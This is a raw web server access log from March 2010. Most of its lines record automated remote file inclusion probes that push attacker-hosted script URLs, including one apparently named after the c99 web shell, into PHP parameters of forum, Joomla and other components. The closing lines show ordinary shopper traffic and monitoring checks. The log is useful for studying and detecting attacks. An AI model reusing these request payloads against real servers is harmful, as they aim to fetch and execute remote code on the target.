212.241.177.123 - - [19/Mar/2010:04:34:12 -0400] "GET /logs//board//bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
193.93.88.26 - - [19/Mar/2010:04:34:12 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.93.88.26 - - [19/Mar/2010:04:34:12 -0400] "GET /index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
193.93.88.26 - - [19/Mar/2010:04:34:12 -0400] "GET /logs/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:34:17 -0400] "GET //board//bbs//////////good.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:34:28 -0400] "GET /logs/access_log.Q109122500%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:35:06 -0400] "GET /logs/access_log.Q110021600//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
193.93.88.26 - - [19/Mar/2010:04:35:33 -0400] "GET /logs/access_log.Q110010300%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:04:35:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.179.244.70 - - [19/Mar/2010:04:36:05 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:36:05 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:36:05 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:36:05 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:36:44 -0400] "GET /index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:36:44 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:36:44 -0400] "GET /logs/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:36:52 -0400] "GET /logs/access_log.Q110010900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
201.28.110.99 - - [19/Mar/2010:04:37:15 -0400] "GET /logs/error_log.Q109061800%20%20/agendax/addevent.inc.php?agendax_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:37:55 -0400] "GET /logs/error_log.Q109081500//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
180.68.242.166 - - [19/Mar/2010:04:38:24 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
180.68.242.166 - - [19/Mar/2010:04:38:24 -0400] "GET /logs/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
180.68.242.166 - - [19/Mar/2010:04:38:24 -0400] "GET /index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:29 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:29 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:32 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:32 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:38:38 -0400] "GET /logs/access_log.Q110031100/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:44 -0400] "GET /logs/access_log.Q110031100//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:47 -0400] "GET /logs/access_log.Q110031100//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
95.110.196.60 - - [19/Mar/2010:04:38:48 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
110.45.144.125 - - [19/Mar/2010:04:38:57 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.144.125 - - [19/Mar/2010:04:38:57 -0400] "GET /logs/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.144.125 - - [19/Mar/2010:04:38:57 -0400] "GET /index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:58 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:38:58 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
193.93.88.26 - - [19/Mar/2010:04:39:04 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:39:08 -0400] "GET /logs/access_log.Q110031100//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
188.138.16.69 - - [19/Mar/2010:04:39:11 -0400] "GET /index.php?pg=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
111.68.103.39 - - [19/Mar/2010:04:39:20 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
111.68.103.39 - - [19/Mar/2010:04:39:20 -0400] "GET /index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
111.68.103.39 - - [19/Mar/2010:04:39:20 -0400] "GET /logs/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:39:25 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:39:25 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
64.237.46.229 - - [19/Mar/2010:04:39:26 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
193.93.88.26 - - [19/Mar/2010:04:39:29 -0400] "GET /logs/error_log.Q109100900/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:39:42 -0400] "GET /logs/access_log.Q110031100//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:40:03 -0400] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:40:03 -0400] "GET /logs/access_log.Q110012700//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:40:03 -0400] "GET //bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:40:08 -0400] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:40:08 -0400] "GET //bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:40:08 -0400] "GET /logs/access_log.Q110020600//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:40:13 -0400] "GET /logs/error_log.Q109081500//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:40:26 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:40:26 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
180.68.242.166 - - [19/Mar/2010:04:40:30 -0400] "GET /logs/access_log.Q110010300%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:40:33 -0400] "GET /logs/access_log.Q110031100//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.76.12.197 - - [19/Mar/2010:04:40:34 -0400] "GET /index.php?pg=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
209.197.232.13 - - [19/Mar/2010:04:40:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:40:47 -0400] "GET /logs/access_log.Q110031200//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:40:47 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.144.125 - - [19/Mar/2010:04:41:04 -0400] "GET /logs/access_log.Q110010300%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:41:08 -0400] "GET /logs/access_log.Q110012100//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:13 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:13 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:14 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:14 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:14 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:14 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:17 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:17 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.29.80.127 - - [19/Mar/2010:04:41:18 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
216.104.46.66 - - [19/Mar/2010:04:41:44 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:44 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:44 -0400] "GET /logs/access_log.Q109102700/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:41:52 -0400] "GET /logs/access_log.Q109112800/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:41:58 -0400] "GET /logs/access_log.Q110012500//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:42:07 -0400] "GET /logs/error_log.Q109051400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
111.68.103.39 - - [19/Mar/2010:04:42:08 -0400] "GET /logs/access_log.Q110010300%20%20/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:42:08 -0400] "GET /template.php?pagina=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:42:08 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:42:08 -0400] "GET /logs/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:42:10 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:42:10 -0400] "GET /template.php?pagina=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:04:42:10 -0400] "GET /logs/template.php?pagina=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
70.98.34.37 - - [19/Mar/2010:04:42:11 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
211.115.68.164 - - [19/Mar/2010:04:42:42 -0400] "GET /template.php?pagina=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:42:42 -0400] "GET /logs/template.php?pagina=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:42:42 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:42:52 -0400] "GET /logs/access_log.Q110020600//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:42:52 -0400] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:42:52 -0400] "GET //bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:43:15 -0400] "GET /logs/access_log.Q110012100//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:04:43:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.68.164 - - [19/Mar/2010:04:43:36 -0400] "GET /template.php?pagina=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:43:36 -0400] "GET /logs/template.php?pagina=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:43:36 -0400] "GET /logs/access_log.Q109121400%20%20/template.php?pagina=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:04:42:52 -0400] "GET /logs/access_log.Q109102700 HTTP/1.0" 200 6408495 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.251.189.4 - - [19/Mar/2010:04:43:52 -0400] "GET /logs/access_log.Q110031100%20%20//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:44:24 -0400] "GET /logs/access_log.Q110031100%20%20//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:44:46 -0400] "GET /logs/error_log.Q109072100//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:44:53 -0400] "GET /logs/access_log.Q110031100%20%20//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.247.11.218 - - [19/Mar/2010:04:45:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:40 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493 HTTP/1.1" 200 37478 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:42 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:42 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:43 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:43 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:43 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:43 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:44 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:44 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:45 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:45 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
